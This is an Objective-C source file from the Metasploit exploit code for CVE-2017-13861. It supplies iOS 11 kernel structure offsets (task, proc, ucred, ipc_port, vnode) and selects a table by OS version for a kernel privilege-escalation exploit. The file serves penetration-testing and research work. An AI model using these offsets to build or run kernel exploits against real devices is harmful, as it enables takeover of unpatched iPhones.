GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/koffsets.m
#import <Foundation/Foundation.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/sysctl.h>
#include <sys/utsname.h>
#include "koffsets.h"
#include "common.h"
// Logging helper: emits "[*] " followed by the formatted message through NSLog.
// `str` must be a string literal (it is pasted onto the @"[*] " literal); `args...`
// is the GNU-style variadic form and `##args` allows the argument list to be empty.
#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(false)
// Currently selected offset table; NULL until offsets_init() runs. Afterwards it
// points at one of the kstruct_offsets_* tables below and is indexed by koffset().
int* offsets = NULL;
// Kernel structure field offsets used for iOS 11.0 – 11.2.6 (chosen by offsets_init()).
// The array is indexed directly with `enum kstruct_offset` (koffsets.h) by koffset(),
// so the ORDER of entries is load-bearing: each position must match the enum
// declaration exactly. The trailing comment on each entry names the enum member it
// is meant for. Layout is identical to kstruct_offsets_11_3 except for the final
// KFREE_ADDR_OFFSET entry.
int kstruct_offsets_11_0[] = {
// task
0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
0x28, // KSTRUCT_OFFSET_TASK_NEXT,
0x30, // KSTRUCT_OFFSET_TASK_PREV,
0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
0x3a0, // KSTRUCT_OFFSET_TASK_TFLAGS

// ipc_port
0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

// proc
0x10, // KSTRUCT_OFFSET_PROC_PID,
0x108, // KSTRUCT_OFFSET_PROC_P_FD
0x18, // KSTRUCT_OFFSET_PROC_TASK
0x100, // KSTRUCT_OFFSET_PROC_UCRED
0x8, // KSTRUCT_OFFSET_PROC_P_LIST

// filedesc
0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES

// fileproc
0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB

// fileglob
0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA

// socket
0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB

// pipe
0x10, // KSTRUCT_OFFSET_PIPE_BUFFER

// ipc_space
0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE

// vnode
0xd8, // KSTRUCT_OFFSET_VNODE_V_MOUNT
0x78, // KSTRUCT_OFFSET_VNODE_VU_SPECINFO
0x0, // KSTRUCT_OFFSET_VNODE_V_LOCK

// specinfo
0x10, // KSTRUCT_OFFSET_SPECINFO_SI_FLAGS

// mount
0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG

// host
0x10, // KSTRUCT_OFFSET_HOST_SPECIAL

// only entry that differs from the 11.3 table
0x6c, // KFREE_ADDR_OFFSET
};
// Kernel structure field offsets used for iOS 11.3 and above. offsets_init() selects
// this table for every CoreFoundation version >= 1452.23 with no upper bound, so it
// is also what later, untested releases get. Indexed directly with
// `enum kstruct_offset` (koffsets.h) by koffset(): entry ORDER must match the enum
// declaration exactly; the trailing comments name the intended enum member. Layout is
// identical to kstruct_offsets_11_0 except for the final KFREE_ADDR_OFFSET entry.
int kstruct_offsets_11_3[] = {
// task
0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
0x28, // KSTRUCT_OFFSET_TASK_NEXT,
0x30, // KSTRUCT_OFFSET_TASK_PREV,
0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
0x3a0, // KSTRUCT_OFFSET_TASK_TFLAGS

// ipc_port
0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

// proc
0x10, // KSTRUCT_OFFSET_PROC_PID,
0x108, // KSTRUCT_OFFSET_PROC_P_FD
0x18, // KSTRUCT_OFFSET_PROC_TASK
0x100, // KSTRUCT_OFFSET_PROC_UCRED
0x8, // KSTRUCT_OFFSET_PROC_P_LIST

// filedesc
0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES

// fileproc
0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB

// fileglob
0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA

// socket
0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB

// pipe
0x10, // KSTRUCT_OFFSET_PIPE_BUFFER

// ipc_space
0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE

// vnode
0xd8, // KSTRUCT_OFFSET_VNODE_V_MOUNT
0x78, // KSTRUCT_OFFSET_VNODE_VU_SPECINFO
0x0, // KSTRUCT_OFFSET_VNODE_V_LOCK

// specinfo
0x10, // KSTRUCT_OFFSET_SPECINFO_SI_FLAGS

// mount
0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG

// host
0x10, // KSTRUCT_OFFSET_HOST_SPECIAL

// only entry that differs from the 11.0 table
0x7c, // KFREE_ADDR_OFFSET
};
/*
 * Look up one kernel structure offset from the table chosen by offsets_init().
 *
 * offset: the `enum kstruct_offset` member to query (declared in koffsets.h). It is
 *         used directly as an index into the selected table, so only declared
 *         members are valid; no bounds check is performed here.
 * Returns the offset in bytes, or 0 (after logging) if offsets_init() has not run.
 *
 * NOTE(review): 0 is not a distinguishable failure value — several genuine table
 * entries (e.g. KSTRUCT_OFFSET_IPC_PORT_IO_BITS, KSTRUCT_OFFSET_VNODE_V_LOCK) are
 * 0x0 — so callers cannot detect the uninitialised case from the return value
 * alone and must call offsets_init() first.
 */
int koffset(enum kstruct_offset offset)
{
    if (offsets != NULL) {
        return offsets[offset];
    }
    LOG("need to call offsets_init() prior to querying offsets");
    return 0;
}
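/*
 * CoreFoundation version boundaries used to pick an offset table. These are the
 * values the author uses for the first iOS 11.0 and iOS 11.3 builds; both are
 * compared with >=, so the 11.3 table is also chosen on any later iOS release.
 */
static const double kCFVersionNumberiOS11_0 = 1443.00;
static const double kCFVersionNumberiOS11_3 = 1452.23;

/*
 * Select the kernel-offset table matching the running OS.
 *
 * Sets the file-global `offsets` to kstruct_offsets_11_3 when
 * kCFCoreFoundationVersionNumber >= 1452.23, to kstruct_offsets_11_0 when it is
 * >= 1443.00, and otherwise logs a message and terminates the process with
 * EXIT_FAILURE. Must be called before koffset(); calling it again simply
 * re-selects the table. There is no upper version bound, so an untested future
 * release silently receives the 11.3 table.
 *
 * The prototype is (void) rather than () so the compiler rejects stray arguments.
 */
void offsets_init(void)
{
    if (kCFCoreFoundationVersionNumber >= kCFVersionNumberiOS11_3) {
        LOG("offsets selected for iOS 11.3 or above");
        offsets = kstruct_offsets_11_3;
    } else if (kCFCoreFoundationVersionNumber >= kCFVersionNumberiOS11_0) {
        LOG("offsets selected for iOS 11.0 to 11.2.6");
        offsets = kstruct_offsets_11_0;
    } else {
        LOG("iOS version too low, 11.0 required");
        exit(EXIT_FAILURE);
    }
}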